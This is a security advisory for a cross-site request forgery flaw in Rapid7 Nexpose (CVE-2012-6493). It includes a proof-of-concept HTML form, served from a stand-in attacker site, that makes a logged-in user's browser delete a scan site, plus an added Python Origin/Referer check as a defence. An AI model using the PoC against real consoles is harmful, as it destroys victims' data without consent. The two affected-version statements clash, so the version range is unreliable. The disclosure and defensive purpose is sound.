Release date:
Updated on:
Affected Systems:
Rapid7 Nexpose <5.5.3
Description:
--------------------------------------------------------------------------------
Bugtraq id: 57150
CVE (CAN) ID: CVE-2012-6493
Nexpose is vulnerability management software.
In versions earlier than Nexpose 5.5.4, the Referer domain of each URL is not correctly checked. A remote attacker who can get a legitimate user's session cookie attached to a forged request (for example by luring the logged-in user to a crafted page) can delete scan data and sites as that user.
<* Source: Robert Gilbert
Link: http://seclists.org/bugtraq/2013/Jan/13
https://community.rapid7.com/docs/DOC-2065#release5
*>
Test method:
--------------------------------------------------------------------------------
Alert
The following procedures (methods) may be offensive and are intended only for security research and teaching. Users do so at their own risk!
Exploit steps for proof-of-concept:
1. Create an external site/page: http://attackersite.com/nexpose-csrf.htm that contains:
[code]
<html>
<!-- Nexpose CSRF PoC -->
<body>
<form action="https://nexpose-security-console-site:3780/data/site/delete?siteid=1" method="POST" enctype="multipart/form-data">
<input type="submit" value="delete site"/>
</form>
<script>
// document.forms[0].submit(); // uncomment to auto-submit
</script>
</body>
</html>
[/code]
2. Lure the victim to http://attackersite.com/nexpose-csrf.htm.
3. The site with ID 1 is deleted when the form is submitted.
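As an added illustration (not Rapid7's code, and not part of the original advisory), the following shows the kind of fail-closed Origin/Referer check on state-changing requests that the description above says was missing. The allowed origin, the header values and the PoC request it is checked against are constructed to match the advisory's example host.

```python
from urllib.parse import urlsplit

# Origins the console accepts for state-changing requests. Constructed for this
# example; it mirrors the host used in the advisory's PoC form action.
ALLOWED_ORIGINS = {"https://nexpose-security-console-site:3780"}

# Methods that must not change state, so they need no origin check.
SAFE_METHODS = {"GET", "HEAD", "OPTIONS"}


def _origin_of(url):
    """Reduce a URL to scheme://host[:port]; return None if it cannot be parsed."""
    parts = urlsplit(url)
    if not parts.scheme or not parts.netloc:
        return None  # covers "Origin: null" and garbage values
    return f"{parts.scheme}://{parts.netloc}".lower()


def csrf_check(method, headers):
    """Return (allowed, reason) for one request.

    Safe methods pass. For every other method the request must carry an Origin
    or Referer header whose origin is exactly one of ALLOWED_ORIGINS. A missing
    header fails closed: a hostile page can suppress Referer/Origin, but a
    browser will not let it forge them to the console's own origin.
    """
    if method.upper() in SAFE_METHODS:
        return True, "safe method"
    # Header names are case-insensitive; normalise once.
    h = {k.lower(): v for k, v in headers.items()}
    source = h.get("origin") or h.get("referer")
    if not source:
        return False, "no Origin/Referer on state-changing request"
    origin = _origin_of(source)
    if origin is None:
        return False, "unparseable Origin/Referer"
    # Exact set membership, not a prefix or substring test, so a look-alike
    # host such as nexpose-security-console-site:3780.attackersite.com fails.
    if origin not in ALLOWED_ORIGINS:
        return False, f"cross-origin request from {origin}"
    return True, "same-origin"


if __name__ == "__main__":
    # The request the PoC form above would produce when served from attackersite.com.
    print(csrf_check("POST", {"Referer": "http://attackersite.com/nexpose-csrf.htm"}))
    # A legitimate delete submitted from the console's own UI.
    print(csrf_check("POST", {"Origin": "https://nexpose-security-console-site:3780"}))
```

A token-based defence (a per-session secret in a hidden form field) is the usual complement to this header check, since some proxies and privacy settings strip Referer and the fail-closed rule above would then reject genuine users.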
Suggestion:
--------------------------------------------------------------------------------
Vendor patch:
Rapid7
------
The vendor has released a patch to fix this security problem. Please download it from the vendor's homepage:
https://community.rapid7.com/docs/DOC-2065#release5